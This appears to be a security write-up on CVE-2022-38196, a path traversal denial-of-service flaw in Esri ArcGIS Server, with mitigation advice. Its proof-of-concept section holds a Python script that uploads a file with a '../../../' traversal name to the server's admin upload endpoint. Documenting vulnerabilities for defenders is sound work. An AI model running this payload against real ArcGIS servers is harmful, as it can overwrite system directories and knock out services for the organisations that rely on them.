CVE-2022-38196 - Denial of Service in Esri ArcGIS Server via Path Traversal Vulnerability

Esri's ArcGIS Server software is utilized widely across various industry verticals for geospatial analysis, data management, and mapping applications. Organizations use ArcGIS Server to create, manage, and publish geographic information system (GIS) services. Recently, a vulnerability was identified in Esri's ArcGIS Server that could allow remote, authenticated attackers to cause a denial of service (DoS) attack.

Vulnerable Versions: Esri ArcGIS Server 10.9.1 and prior

Exploit Details

The vulnerability identified is a path traversal vulnerability. Path traversal vulnerabilities occur in software when user-input is used to construct a file or directory path while reading, writing, or executing files without proper validation or sanitization. In this case, ArcGIS Server doesn't effectively validate or sanitize user-input that eventually leads to the path traversal.

An attacker can exploit this weakness to overwrite the internal ArcGIS Server directory, resulting in a Denial of Service attack. A successful exploitation of the vulnerability requires an authenticated remote attacker. However, considering the widespread use of ArcGIS Server, the impact of a successful exploit can be significantly detrimental to an organization.

Proof of Concept (PoC) code snippet

import requests
from requests.auth import HTTPBasicAuth

# Connect to ArcGIS Server instance
arcgis_server_url = 'https://<arcgis_server_url>';
username = '<your_username>'
password = '<your_password>'

# Test file upload path traversal vulnerability
upload_url = f'{arcgis_server_url}/arcgis/admin/uploads/upload'
upload_payload = {
    'itemType': 'filePath'
}
files = {
    'itemFile': (
        '../../../arcgis/server/usr/directories/arcgissystem/arcgisuploads/test.txt',
        'Malicious content'
    )
}
response = requests.post(
    upload_url,
    auth=HTTPBasicAuth(username, password),
    data=upload_payload,
    files=files
)

# Check if the upload was successful
if response.status_code == 200:
    print("Upload succeeded")
else:
    print("Upload failed")
 

Original References

1. Esri Security Advisory
2. National Vulnerability Database (NVD) - CVE-2022-38196

Mitigation and Recommendations

Esri, the developer of ArcGIS Server, has released a security patch that addresses this vulnerability. Users of ArcGIS Server versions 10.9.1 and prior are advised to upgrade to the latest version which incorporates the security patch. Additionally, the following security best practices are recommended to minimize the risk of exploitation:

Restrict access to the ArcGIS Server instance to trusted users and limit remote access.

2. Regularly apply updates and security patches for ArcGIS Server and other software components used in the environment.
3. Implement strong authentication and access control mechanisms to reduce the risk of unauthorized users gaining access to sensitive information.

Regularly monitor system logs and network traffic to detect any anomalies or malicious activity.

By staying vigilant and adhering to the recommended best practices, organizations can significantly reduce the risk of falling prey to such attacks that exploit vulnerabilities in popular geospatial software like Esri's ArcGIS Server.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/31/2022 13:45:00 UTC